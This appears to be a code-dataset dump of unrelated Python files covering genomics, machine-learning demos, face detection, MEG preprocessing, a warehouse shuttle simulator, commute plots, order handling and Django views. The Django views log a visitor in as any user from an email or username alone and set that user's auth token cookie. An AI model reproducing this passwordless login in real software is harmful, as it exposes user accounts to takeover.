outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 3.0 and coverage > 0.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\noutfile.close()\noutfile2.close()\n\nfor gene in gene_files :\n outfile3 = open(\"Results/RNA/Imbalance/imbalance_\" + gene + \"_exons.txt\", \"w\")\n outfile3.write(\"Sample\")\n for exon in exon_result_dict[bam][gene][0] :\n outfile3.write(\"\\t\" + exon[0])\n outfile3.write(\"\\n\")\n for bam in bam_files :\n sample = bam.split(\"/\")[-1].split(\"Aligned\")[0]\n i = 0\n for exon in exon_result_dict[bam][gene][0] :\n if i == 0 :\n outfile3.write(sample)\n outfile3.write(\"\\t\" + str(round(exon[4],1)))\n i += 1\n outfile3.write(\"\\n\")\n outfile3.close()\n","sub_path":"src/Imbalance.py","file_name":"Imbalance.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378072455","text":"from sklearn.cluster import KMeans\r\nX = [[1],[2],[3],[4],[5]]\r\ny = [4,2,6,1,3]\r\nclf = KMeans(n_clusters=2)\r\nclf.fit(X,y)\r\nprint(clf)\r\nprint(clf.labels_) \r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(X, y, 'ks')\r\nplt.show()\r\n","sub_path":"第2章数据分析常用库/test02_06.py","file_name":"test02_06.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"585007988","text":"import cv2\nimport numpy as np\n\n#pra capturar o vídeo\ncap = cv2.VideoCapture(0)\n\n#carregando o modelo pré-treinado\nfaceClassif = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nwhile True:\n\t#pra ler a captura de vídeo\n ret,frame = cap.read()\n #convertendo a captura pra preto e branco pra ficar mais facil na hora de virar binário\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n #modelando o classificador de rosto\n faces = faceClassif.detectMultiScale(gray, 1.3, 5)\n\n #capturar o retangulo do rosto\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y),(x+w,y+h),(0,255,0),2)\n #pra mostrar a gravação \n cv2.imshow('frame',frame)\n \n\n #botão pra parar a cam\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"detec-rosto-cam.py","file_name":"detec-rosto-cam.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"441916031","text":"\"\"\"\nTrain in syllable localizer (ka, fi, nu) test in task\n\"\"\"\nimport numpy as np\nimport pickle\nimport os.path as op\nimport pandas as pd\n\nfrom mne import find_events, Epochs\nfrom mne.epochs import concatenate_epochs\nfrom mne.io import read_raw_kit\n\nfrom jr.meg import least_square_reference\n\nfrom data.R1022_160204 import meg_files, session\n\n# data_path = '/media/DATA/Pro/Projects/NewYork/audio_wm/data/'\ndata_path = op.join('/media/jrking/harddrive/Audio_sequence/data/', session)\n\nruns = meg_files.query('typ == \"main\"')\nparams = [dict(name='sounds', query=None, tmin=-.200, tmax=.700),\n dict(name='targets', query='type==\"target\" & sound_idx==0',\n tmin=-.200, tmax=1.500),\n dict(name='probes', query='type==\"probe\" & sound_idx==0',\n tmin=-.200, tmax=1.500)]\nfor param in params:\n all_epochs = list()\n 
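# Each run is processed independently and the per-run Epochs objects are\n    # concatenated at the end. The steps below: load the behavioural pickle,\n    # rebuild the event table and check it against the MEG triggers, apply a\n    # least-squares projection of the reference channels (note it is applied\n    # twice, before and after bad-channel interpolation), band-pass filter\n    # 0.51-30 Hz, epoch, and decimate by 10.\n    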
all_events = list()\n for ii, run in runs.iterrows():\n meg = op.join(data_path, run.fname)\n mrk = op.join(data_path, run.marker)\n hsp = op.join(data_path, run.hsp)\n elp = op.join(data_path, run.elp)\n bhv = op.join(data_path, run.bhv)\n\n # Read behavior file and make event DataFrame\n with open(bhv, 'rb') as f:\n bhv = pickle.load(f)\n events = list()\n for t, trial in enumerate(bhv.entries):\n for typ in ['target', 'probe']:\n for n in range(trial['n_sounds']):\n events.append(dict(\n onset=trial['trigger_on_%s_%i' % (typ, n)],\n offset=trial['trigger_off_%s_%i' % (typ, n)],\n trigger=trial['trigger_value_%s_%i' % (typ, n)],\n sound=trial[typ][n].split('_f5')[0],\n type=typ, trial=t, sound_idx=n,\n mismatch_position=trial['mismatch_position']))\n bhv_events = pd.DataFrame(events)\n\n # Read data\n raw = read_raw_kit(meg, preload=True, mrk=mrk, elp=elp, hsp=hsp)\n for bad in run.bad_channels:\n raw.info['bads'] += [bad]\n\n # Correct signal trigger\n raw._data[-1, :] -= 255\n raw._data[-1, :] *= -1\n events = find_events(raw, min_duration=.010) # MEG events\n sel_trigger = np.unique(bhv_events['trigger']) # Trigger values\n # Subselect only target and probe events\n events = np.array([e for e in events if e[2] in sel_trigger])\n np.testing.assert_array_equal(events[:, 2], bhv_events['trigger'])\n # subselect\n if param['query']:\n bhv_events = bhv_events.query(param['query'])\n events = events[bhv_events.index]\n event_id = {str(val): val for val in np.unique(bhv_events['trigger'])}\n\n # Apply Least Square projection from ref channels\n raw = least_square_reference(raw)\n\n # Interpolate bad channels\n raw.interpolate_bads()\n\n # Apply Least Square projection from ref channels\n raw = least_square_reference(raw)\n\n # Filter\n raw.filter(.51, h_freq=30.0)\n\n # Epoch all sounds\n epochs = Epochs(raw, events, tmin=param['tmin'], tmax=param['tmax'],\n baseline=None, verbose=False, event_id=event_id)\n epochs.decimate(10)\n all_epochs.append(epochs)\n all_events.append(bhv_events)\n # Save\n epochs = concatenate_epochs(all_epochs)\n epochs.save(op.join(data_path, param['name'] + '-epo.fif'))\n events = pd.concat(all_events)\n with open(op.join(data_path, param['name'] + '-eve.pkl'), 'wb') as f:\n pickle.dump(events, f)\n # Clear memory\n epochs = events = all_events = all_epochs = None\n","sub_path":"scripts/analysis/pilots/R1022_2.4.16/main_task_preprocess.py","file_name":"main_task_preprocess.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"626550021","text":"from os import getenv\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.models import Site\nfrom django.db.models import Q\nfrom django.shortcuts import redirect, render\nfrom django.utils import timezone\nfrom django.views.decorators.cache import cache_control\nfrom django.views.generic import TemplateView, RedirectView\nfrom rest_framework.authtoken.models import Token\n\nfrom api.constants import AngularPages\nfrom web.constants import SAVE_THE_DATE_ID\n\n\nlogger = logging.getLogger(__name__)\n\nclass BaseMixin(object):\n def get_context_data(self, **kwargs):\n\n context = super(BaseMixin, self).get_context_data(**kwargs)\n\n if self.token:\n context['auth_token'] = self.token.key\n context['friendly_name'] = self.token.user.userprofile.friendly_name\n context['base_url'] = getenv('BASEURL', \"https://{}\".format(Site.objects.get(id=1)))\n 
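# BaseMixin relies on the concrete view having set self.token (a\n        # rest_framework Token, or None) and self.page before the context is\n        # built; MainView.get() below populates both. base_url falls back to\n        # the django.contrib.sites Site record when no BASEURL environment\n        # variable is set.\n        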
context['event_date'] = settings.EVENT_DATE or ''\n context['page'] = self.page\n\n return context\n\n\nclass UnAuthenticatedView(TemplateView):\n template_name = 'unauthenticated.html'\n\n @cache_control(public=True)\n def get(self, request, *args, **kwargs):\n response = super(UnAuthenticatedView, self).get(request, *args, **kwargs)\n\n try:\n token = Token.objects.get(key=self.request.COOKIES.get('auth_token', ''))\n except Token.DoesNotExist:\n pass\n else:\n return redirect('web-home', username=token.user.username)\n\n return response\n\n def post(self, request, *args, **kwargs):\n response = super(UnAuthenticatedView, self).get(request, *args, **kwargs)\n\n email = request.POST.get('email')\n username = request.POST.get('token')\n user = None\n\n try:\n if email:\n user = User.objects.get(email=email)\n elif username:\n user = User.objects.get(username=username)\n else:\n return render(request, self.template_name, {'error': 'You need to enter something.'})\n except User.DoesNotExist:\n return render(request, self.template_name, {'error': 'User not found.'})\n\n return redirect('web-home', username=user.username)\n\n\nclass MainView(BaseMixin, TemplateView):\n template_name = 'main.html'\n\n @cache_control(private=True)\n def get(self, request, username, *args, **kwargs):\n try:\n user = User.objects.get(username=username)\n self.token = Token.objects.get(user=user)\n except (User.DoesNotExist, Token.DoesNotExist):\n self.token = None\n\n self.page = self.request.COOKIES.get('page', '')\n response = super(MainView, self).get(request, *args, **kwargs)\n response.delete_cookie('page')\n\n if self.token:\n response.set_cookie(key='auth_token', value=self.token.key)\n userprofile = self.token.user.userprofile\n userprofile.date_viewed = timezone.now()\n userprofile.save()\n else:\n return redirect('unauthenticated-web-home')\n\n return response\n\n\nclass SaveTheDateView(RedirectView):\n pattern_name = 'web-home'\n # query_string = True\n\n def get(self, request, username=None, *args, **kwargs):\n response = super(SaveTheDateView, self).get(request, username, *args, **kwargs)\n response.set_cookie(key='page', value=SAVE_THE_DATE_ID)\n return response\n","sub_path":"kromeo2015/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"600775294","text":"import numpy as np\nimport pandas as pd\nimport datetime\nfrom openpyxl.chart import Reference, BarChart, PieChart\nfrom openpyxl.chart.layout import Layout, ManualLayout\nfrom Basic.excelhandler import ExcelHelper, title\nfrom ShuttleSim.shelf import *\n\n\nclass Simulator:\n # def __init__(self):\n\n @classmethod\n def sim(self, project_id, shuttle_model='', nlifts=0, nshuttles=0, hour=4):\n ConfigShelf.load_setting(project_id)\n if (shuttle_model == ''):\n shuttle_model = ConfigShelf.shuttle_model\n ConfigShuttle.load_setting(shuttle_model)\n G.Arrival_mean = 3600 / (ConfigShelf.DualCyclePerHR) / 1.05\n\n # simulator=EngSimulator\n # sim = simulator(\"ssi-sh-hella\", 'v2h')\n # G.Arrival_mean =10000\n result = self._runonce(nlifts, nshuttles, hour)\n if (input('Need Detail Reporting?(Y)') == 'y'):\n rep = SimReporter()\n rep.report(*result, False)\n # rep.report(result[0], result[1], result[2])\n\n @classmethod\n def _runonce(self, nlifts=0, nshuttles=0, hour=1):\n def _clear_setting():\n ShelfArea.NextID = 0\n ShelfArea.total_location_list = []\n Lift.NextID = 0\n StdShuttle.NextID = 0\n G.clear_setting()\n\n 
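# ShelfArea, Lift and StdShuttle keep counters and location lists as\n        # class-level state, so they have to be wiped before every run or a\n        # second simulation in the same process would inherit the previous\n        # layout on top of the new one.\n        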
_clear_setting()\n\n if (nlifts > 0):\n ConfigShelf.NLifts = nlifts\n if (nshuttles > 0):\n ConfigShelf.NShuttles = nshuttles\n ShelfArea.build_via_lift(ConfigShelf.NLifts, ConfigShelf.NShuttles)\n\n print(\"Simulation Start!\", \"Lift:%i Shuttle:%i\" % (ConfigShelf.NLifts, ConfigShelf.NShuttles))\n G.sim_hour = hour\n G.env.run(until=G.sim_hour * 3600)\n\n logs = df = pd.DataFrame(G.Logs)\n inbound = df[df[\"Task_Type\"] == \"inbound_box_take\"].shape[0] / hour\n outbound = df[df[\"Task_Type\"] == \"outbound_box_putaway\"].shape[0] / hour\n\n print(\"Simulation finished!\")\n print(\"入库/小时:%.1f\" % inbound)\n print(\"出库/小时:%.1f\" % outbound)\n return [logs, inbound, outbound]\n\n\nclass SimReporter:\n def __init__(self):\n # self.pagerows = 60\n self.excelhelper = ExcelHelper()\n self.ws = self.excelhelper.get_sheet(if_exist=\"replace\")\n\n def report(self, logs, inbound, outbound, csvlog=True):\n print(\"Report Generating...\")\n self.logs = logs\n self.inbound = inbound\n self.outbound = outbound\n\n if (csvlog):\n self.logs.to_csv(\"D:/log.csv\")\n\n self.excelhelper.df_to_excel(self.logs, \"logs\", if_exist=\"replace\")\n\n self.frontpage()\n self.nextpage()\n self.parameters()\n self.nextpage()\n self.setting()\n self.nextpage()\n self.result()\n self.nextpage()\n\n self.ws.print_area = \"A1:E\" + str(self.ws._current_row)\n # self.draw_bar()\n\n print(\"Exporting! DO NOT Shutdown!!\")\n self.excelhelper.save()\n print(\"Report Exported!\")\n\n def append(self, list, style=None):\n for i, field in enumerate(list):\n if type(field) == np.float64:\n list[i] = \"%.1f\" % field\n else:\n list[i] = str(field)\n\n # print(self.ws._current_row)\n self.ws.append(list)\n if style is not None:\n for i in range(len(list)):\n self.ws.cell(row=self.ws._current_row, column=i + 1).font = title\n\n def nextpage(self):\n curr = self.ws._current_row\n fpage = 54\n page = 60\n if curr <= fpage:\n rest = fpage - self.ws._current_row\n else:\n curr -= fpage\n rest = page - curr % page\n\n self._blank(rest)\n\n def _blank(self, lines=1):\n for i in range(lines):\n self.append(self.excelhelper.blank)\n\n def frontpage(self):\n self._blank(22)\n self.append([\"\", \"凯乐士Flash穿梭车系统\"], title)\n self.append([\"\", \"仿真报告\"], title)\n self._blank(1)\n self.append([\"\", \"Galaxis Flash Shuttle System\"], title)\n self.append([\"\", \"Simulation Report\"], title)\n self._blank(3)\n self.append([\"\", \"Copyright © 2016 Galaxis Automotion Management GmbH. 
All rights reserved.\"])\n self._blank(8)\n self.append([\"\", \"项目名称\", ShelfArea.AProject_name])\n self.append([\"\", \"Project_name\"])\n self._blank(1)\n self.append([\"\", \"客户名称\"])\n self.append([\"\", \"Customer\"])\n self._blank(1)\n self.append([\"\", \"\", datetime.date.today()])\n # self.append([\"\", \"Customer\"])\n # self._blank(3)\n\n def parameters(self):\n\n self.append([\"穿梭车系统设置\"])\n self.append([\"System Configuration\"])\n self.append([\"\", \"\", \"数量\", \"单元尺寸*\", \"总尺寸*\"])\n self.append([\"\", \"\", \"Number\", \"Unit Size*\", \"Total Size*\"])\n self.append([\"\", \"巷道\", ShelfArea.NAisles, ShelfArea.aisle_width, ShelfArea.areawidth])\n self.append([\"\", \"Aisle\"])\n self._blank()\n\n self.append([\"\", \"列\", ShelfArea.NBays, ShelfArea.beam_length, ShelfArea.arealength])\n self.append([\"\", \"Bay\"])\n self._blank()\n\n self.append([\"\", \"层\", ShelfArea.NLevels, ShelfArea.level_height, ShelfArea.areaheight])\n self.append([\"\", \"Level\"])\n self._blank()\n\n self.append([\"\", \"提升机数量\", Lift.NextID])\n self.append([\"\", \"Number of Lifts\"])\n self._blank()\n self.append([\"\", \"穿梭车数量\", StdShuttle.NextID])\n self.append([\"\", \"Number of Shuttles\"])\n self._blank()\n self.append([\"\", \"货位数量\", len(ShelfArea.total_location_list)])\n self.append([\"\", \"Number of Locations \"])\n self._blank()\n\n self.append([\"\", \"*所有尺寸均为仿真所用近似值,准确尺寸以图纸为准\"])\n self.append([\"\", \"*All dimensions are not accuracy but only an approach for simulation\"])\n self._blank(3)\n\n self.append([\"设备型号*\", ConfigShuttle.Model[0:2]])\n self.append([\"Equipment Parameter*\"])\n self.append([\"\", \"\", \"最大速度\", \"加速度\"])\n self.append([\"\", \"\", \"Maxspeed\", \"Acceleration\"])\n self.append([\"\", \"穿梭车直线行驶\", ConfigShuttle.longitudinal_maxspeed,\n ConfigShuttle.longitudinal_accelerate])\n self.append([\"\", \"Shuttle Longtitudinal\"])\n self._blank()\n self.append([\"\", \"穿梭车横向行驶\", ConfigShuttle.horizontal_maxspeed,\n ConfigShuttle.horizontal_accelerate])\n self.append([\"\", \"Shuttle Horizontal\"])\n self._blank()\n self.append([\"\", \"提升机提升\", ConfigShuttle.lift_up_maxspeed, ConfigShuttle.lift_up_accelerate])\n self.append([\"\", \"Lift\"])\n self._blank()\n # self.append([\"\", \"穿梭车装卸时间\", ConfigShuttle.load_time])\n # t = StdShuttle.drive_in_lift\n # self.append([\"\", \"穿梭车进入提升机时间\", t])\n # ws.append([\"\", \"Time Per Shuttle Pick\", G.pick_time])\n\n # self._blank(1)\n self.append([\"\", \"*以上参数仅为本次仿真参数,不作为交付标准的证明.实际设备参数请参考商务文件.\"])\n self.append([\"\", \"*Not commitment. 
For delivery standard, please check the business contract\"])\n\n # self.nextpage()\n\n def setting(self):\n\n self._blank(3)\n self.append([\"仿真设置\"])\n self.append([\"Simulation Setting\"])\n self.append([\"\", \"仿真时长\", G.sim_duration()])\n self.append([\"\", \"Simulation Duration\"])\n self._blank()\n self.append([\"\", \"双循环任务每小时\", ConfigShelf.DualCyclePerHR])\n self.append([\"\", \"Dual-Cycle Per Hr\"])\n self._blank()\n self.append([\"\", \"单循环任务每小时\", ConfigShelf.SingleCyclePerHR])\n self.append([\"\", \"Single-Cycle Per Hr\"])\n self._blank()\n self._blank(3)\n\n self.append([\"仿真前提条件\"])\n self.append([\"Simulation Assumption\"])\n self._blank(1)\n self.append([\" 入出提升机布置于同层平面\"])\n self.append([\" Infeed&Outfeed P&D station in same level\"])\n self._blank(1)\n self.append([\" 提升机始终保持双循环作业: 当一台穿梭车驶出之后, 提升机会装载另一台穿梭车并将其送至输送线层\"])\n self.append([\" Lift always work in dual-cycle mode:After send a shuttle into aisle,\"])\n self.append([\" Lift will pick another shuttle and bring it to p&d station\"])\n self._blank(1)\n self.append([\" 穿梭车尽量以双循环作业: 当卸载一个货物之后, 穿梭车会直接装载一个出库货物, 然后才返回提升机\"])\n self.append([\" Shuttle always try to work in dual-cycle mode:\"])\n self.append([\" After unload goods, shuttle will directly pick up another goods, then back to lift\"])\n self._blank(1)\n self.append([\" 出库端始终保持通畅(无需有额外等待时间)\"])\n self.append([\" Enough outfeed capacity to avoid wait on outfeed\"])\n self._blank()\n self.append([\" 入库任务服从poisson分布,也即到达间隔时间服指数分布\"])\n self.append([\" The arrival of inbound box obey a passion distribution\"])\n self.append([\" Thus inbound box arrives under an exponential distribution\"])\n self._blank(3)\n # self.nextpage()\n\n def result(self):\n def draw_bar(self):\n ws = self.ws\n end_row = ws._current_row - 1\n start_row = end_row - self.shuttle_job.shape[0]\n end_col = self.shuttle_job.shape[1]\n bar = BarChart()\n bar.height = 10\n bar.width = 18\n labels = Reference(ws, min_col=1, min_row=start_row + 1, max_col=1, max_row=end_row)\n data = Reference(ws, min_col=2, min_row=start_row, max_col=end_col, max_row=end_row)\n bar.add_data(data, titles_from_data=True)\n bar.set_categories(labels)\n bar.title = \"每小时完成作业量\\nTasks Finished by Hour\"\n ws.append(self.excelhelper.blank)\n ws.add_chart(bar, \"A\" + str(ws._current_row))\n ws._current_row += 20\n # self.nextpage()\n\n def utility(self, name):\n # self._blank(2)\n name_util = name + \"_util\"\n utility = self.logs.groupby([name, \"Task_Type\"]).sum()[\"TimeCost\"].unstack() / G.sim_duration()\n utility = utility.drop(\"\")\n # utility.fillna(0)\n utility.to_csv(\"D:\\\\\" + name_util + \".csv\")\n utility = utility.mean()\n self.excelhelper.series_to_excel(utility, name_util, if_exist=\"replace\")\n ws = self.excelhelper.get_sheet(name_util)\n\n pie = PieChart()\n pie.height = 13\n pie.width = 18\n labels = Reference(ws, min_col=1, min_row=1, max_col=15, max_row=1)\n data = Reference(ws, min_col=1, min_row=2, max_col=15, max_row=2)\n pie.add_data(data, from_rows=True)\n pie.set_categories(labels)\n # pie.layout.layoutTarget =\n # pie.style = 259\n pie.title = name + \" Timecost By Task Type\"\n wsd = self.excelhelper.get_sheet()\n # wsd.append(self.excelhelper.blank)\n wsd.add_chart(pie, \"A\" + str(wsd._current_row))\n wsd._current_row += 28\n\n self.append([\"仿真结果\"])\n self.append([\"Simulation Result\"])\n self._blank(3)\n\n self.append([\"系统整体吞吐(小时)\"])\n self.append([\"Hourly Performance of Whole System\"])\n self._blank()\n sgp = self.logs.groupby([\"Hour\", \"Task_Type\"])\n self.shuttle_job = 
sgp.count()[\"BoxID\"].unstack().reset_index()\n self.shuttle_job = self.shuttle_job.ix[:, [\"Hour\", \"inbound_box_take\", \"outbound_box_putaway\", \"pick_pieces\"]]\n\n self.shuttle_job = self.shuttle_job.fillna(0)\n # print(self.shuttle_job)\n self.excelhelper.df_to_excel(self.shuttle_job.astype(float))\n\n draw_bar(self)\n self._blank(3)\n self.append([\"单台设备整体吞吐/小时\"])\n self.append([\"Performance of Each Equopment\"])\n self.append([\"\", \"\", \"箱每小时\"])\n self.append([\"\", \"\", \"Box/Hour\"])\n self.append([\"\", \"每穿梭车入库\", self.inbound / ConfigShelf.NShuttles])\n self.append([\"\", \"Inbound per Shuttle\"])\n self._blank()\n self.append([\"\", \"每穿梭车出库\", self.outbound / ConfigShelf.NShuttles])\n self.append([\"\", \"Outbound per Shuttle\"])\n self._blank()\n self.append([\"\", \"每提升机入库\", self.inbound / ConfigShelf.NLifts])\n self.append([\"\", \"Inbound per Lift\"])\n self._blank()\n self.append([\"\", \"每提升机出库\", self.outbound / ConfigShelf.NLifts])\n self.append([\"\", \"Outbound per Lift\"])\n self._blank()\n\n self.nextpage()\n self._blank()\n utility(self, \"Shuttle\")\n utility(self, \"Lift\")\n","sub_path":"ShuttleSim/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":13056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347839932","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n#import matplotlib\n#matplotlib.use(\"Agg\")\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport random\n\n'''\ndef makeLine(i, j, xmax, ymin, ymax):\n if(((i+1)<=xmax)and((j-1)>=ymin)and((j+1)<=ymax)):\n makeLine(i+1, j-1, xmax, ymin, ymax)\n\n plt.plot([i,j], [i+1,j-1])\n plt.plot([i,j], [i+1,j+1])\n\n if(((i+1)<=xmax)and((j-1)>=ymin)and((j+1)<=ymax)):\n makeLine(i+1, j+1, xmax, ymin, ymax)\n'''\n\nxlist = []\nylist = []\nfor i in range(0, 31):\n xlist.append(i)\n ylist.append(i)\n\ni = 0\nwhile i < len(xlist):\n j = 0\n while j < len(ylist):\n plt.plot(xlist[i], ylist[j], \"ro\")\n j += 1\n i += 1\n\n#makeLine(0, len(ylist)/2, len(xlist)-1, 0, len(ylist)-1)\n\ni = 15\nj = 15\n#test_list = []\n#test_list.append(j)\n\nwhile (i+1)0 and (j+1)= 6) & (time.hour < 9):\n return 'morning'\n elif (time.hour >= 16) & (time.hour < 19):\n return 'evening'\n else:\n return None\n\ndef pricevdrives(frame, time):\n MPSFT = list(frame.Mean_List_Price_psqft.values)\n drive = 'combined_guess_'+time\n CBDT = list(frame[drive].values)\n zipcs = list(frame.ZIP.values)\n source = ColumnDataSource(data=dict(PriceSQFT=MPSFT, Combined_Drive=CBDT,\n ZIP = zipcs))\n title = \"Price per sqft VS {} Combined Commute\".format(time)\n p = figure(plot_height=350, toolbar_location=None, title=title)\n p.scatter(x='Combined_Drive', y='PriceSQFT', source=source, fill_color=factor_cmap('ZIP', palette=list(Category20[len(zipcs)]), factors=zipcs), size=15)\n p.y_range.end = 600\n p.x_range.end = 70\n labels = LabelSet(x='Combined_Drive', y='PriceSQFT', text='ZIP', level='glyph',\n x_offset=5, y_offset=5, source=source, render_mode='canvas')\n p.add_layout(labels)\n return p\n\n\nengine = create_engine(dbloc, echo=True)\nconnection = engine.connect()\ndata= pd.read_sql(\"SELECT * FROM driveestimates\", con=connection)\ndata.drop_duplicates(inplace=True)\n\ndata.columns = ['address', BaseConfig.PERSONA+'_guess', \n BaseConfig.PERSONA+'_traffic', BaseConfig.PERSONB+'_guess',\\\n BaseConfig.PERSONB+'_traffic', 'date_time']\n\n\ndata.columns = ['address', BaseConfig.PERSONA+'_guess', \n BaseConfig.PERSONA+'_traffic', 
BaseConfig.PERSONB+'_guess',\\\n BaseConfig.PERSONB+'_traffic', 'date_time']\ndata['cleandate']=data.date_time.apply(lambda x: pd.to_datetime(x))\ndata['hour'] = data.cleandate.apply(lambda x: int(x.hour))\ndata['commute'] =data.cleandate.apply(lambda x: id_drive(x))\ndata['ZIP']=data.address.apply(lambda x: x[-5:])\n\ncolors = Category20[len(data.ZIP.unique())]\ncolormap = {}\nfor i, j in enumerate(data.ZIP.unique()):\n colormap[j]=colors[i]\n \ndata['color']= data.ZIP.apply(lambda x: colormap[x]) \ndata.sort_values(by='ZIP', inplace=True)\nhouses =list(data.address.unique())\n\n## Sub-divide data\namdata = data[data['hour']<=12]\npmdata = data[data['hour']>=12]\nsourceAM = ColumnDataSource(amdata)\nsourcePM= ColumnDataSource(pmdata)\n\nhover = HoverTool(tooltips=[(\"address\",\"@address\")])\n## Make Tooltipsconfig\n##establish amplot\np1 = figure(title=\"Morning Drive Estimates From Google\", \n x_range=houses, y_range=(0, 90), plot_width=1700)\n\n\nama = p1.scatter(\"address\", BaseConfig.PERSONA+'_traffic', color='color',\n marker='inverted_triangle', source=sourceAM, size=10)\n\namb = p1.scatter(\"address\", BaseConfig.PERSONB+'_guess', color='color',\n marker='x', source=sourceAM, size=10)\n\n## add the pretties\nlegend = Legend(items=[\n (BaseConfig.PERSONA, [ama]),\\\n (BaseConfig.PERSONB, [amb]),\n ], location=(0, -30))\n\np1.xaxis.major_label_text_font_size=\"10pt\"\np1.xaxis.major_label_orientation = math.pi/2\np1.add_layout(legend, 'right')\np1.add_tools(hover)\n\n##establish amplot\np2 = figure(title=\"Evening Drive Estimates From Google\",\n x_range=houses, y_range=(0, 90), plot_width=1700)\npma = p2.scatter(\"address\", BaseConfig.PERSONA+'_traffic', color='color',\n marker='inverted_triangle', source=sourcePM, size=10)\n\npmb = p2.scatter(\"address\", BaseConfig.PERSONB+'_guess', color='color',\n marker='x', source=sourcePM, size=10) \n\n## add the pretties\nlegend2 = Legend(items=[\n (BaseConfig.PERSONA, [pma]),\\\n (BaseConfig.PERSONB, [pmb]),\n ], location=(0, -30))\n\np2.xaxis.major_label_text_font_size=\"12pt\"\np2.xaxis.major_label_orientation = math.pi/2\np2.add_layout(legend2, 'right')\np2.add_tools(hover)\n\n\n\n\nfrom bokeh.io import output_file, save\nfilename1 = 'morning_drives.html'\noutput_file(filename1)\nsave(p1)\n\n\nfilename2 = 'evening_drives.html'\noutput_file(filename2)\nsave(p2)\n\n","sub_path":"drive_compare.py","file_name":"drive_compare.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"224085943","text":"from order_class import OnlineOrder\r\nfrom decorators import *\r\nfrom datetime import datetime as dt\r\n\r\n\r\nclass Orders:\r\n\r\n\r\n unique_ind = []\r\n\r\n\r\n\r\n def __init__(self):\r\n self.orders = []\r\n\r\n\r\n\r\n def add_to_list(self, order: OnlineOrder):\r\n self.orders.append(order)\r\n\r\n\r\n\r\n\r\n def remove_from_list(self, id):\r\n for i in range(len(self.orders)):\r\n if self.orders[i].get_field('id') == int(id):\r\n del self.orders[i]\r\n return\r\n\r\n\r\n\r\n\r\n def change(self, ind, order: OnlineOrder):\r\n self.orders[ind] = order\r\n\r\n\r\n\r\n def __getitem__(self, item):\r\n return self.orders[item]\r\n\r\n\r\n\r\n def print_list(self):\r\n for i in range(0, len(self.orders)):\r\n print(self.orders[i])\r\n\r\n\r\n\r\n def search_in_list(self, value):\r\n for i in self.orders:\r\n if i.search(value):\r\n print(i)\r\n\r\n\r\n\r\n def compare(self, param, x, y):\r\n if param == 'order_date':\r\n a = dt.strptime(x, 
\"%d.%m.%Y\")\r\n b = dt.strptime(y, \"%d.%m.%Y\")\r\n if a > b:\r\n return True\r\n return False\r\n\r\n\r\n\r\n def sort(self, param):\r\n for i in range(len(self.orders)):\r\n for j in range(len(self.orders) - i - 1):\r\n a = self.orders[j].get_field(param)\r\n b = self.orders[j + 1].get_field(param)\r\n if self.compare(param, a, b):\r\n self.orders[j], self.orders[j + 1] = self.orders[j + 1], self.orders[j]\r\n\r\n\r\n\r\n def rewrite_file(self, file):\r\n with open(file, 'w') as f:\r\n for i, elem in enumerate(self.orders):\r\n if i != len(self.orders) - 1:\r\n f.write(elem.str_format() + '\\n')\r\n else:\r\n f.write(elem.str_format())\r\n f.close()\r\n\r\n\r\n\r\n def add(self, val, file, param=None):\r\n arg = val.split()\r\n if len(arg) != 7:\r\n print('Not all arguments were inputeddd')\r\n return\r\n obj = OnlineOrder(arg)\r\n if obj.exist():\r\n if self.unique_ind.count(arg[0]) == 0:\r\n self.add_to_list(obj)\r\n self.unique_ind.append(arg[0])\r\n if param is None:\r\n self.rewrite_file(file)\r\n else:\r\n print('Id is not unique')\r\n\r\n def del_element_at(self, id):\r\n self.orders.pop(id)\r\n\r\n def remove(self, file, id):\r\n self.del_element_at(id)\r\n self.rewrite_file(file)\r\n\r\n\r\n\r\n\r\n def fill_list_from_file(self, file):\r\n f = open(file, 'r')\r\n input_lines = f.readlines()\r\n for line in input_lines:\r\n if len(line.split()) != 7:\r\n print('Not all arguments were uploaded')\r\n else:\r\n self.add(line, file, 'file')\r\n print('Well done!')\r\n return self\r\n","sub_path":"programming_task_5/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"473945185","text":"#!/usr/bin/env python\n\"\"\"This module contains tests for flows-related API handlers.\"\"\"\n\n\n\n\nfrom grr.gui import api_test_lib\nfrom grr.gui.api_plugins import flow as flow_plugin\n\nfrom grr.lib import aff4\nfrom grr.lib import flags\nfrom grr.lib import flow\nfrom grr.lib import flow_runner\nfrom grr.lib import output_plugin\nfrom grr.lib import rdfvalue\nfrom grr.lib import test_lib\nfrom grr.lib import throttle\nfrom grr.lib import 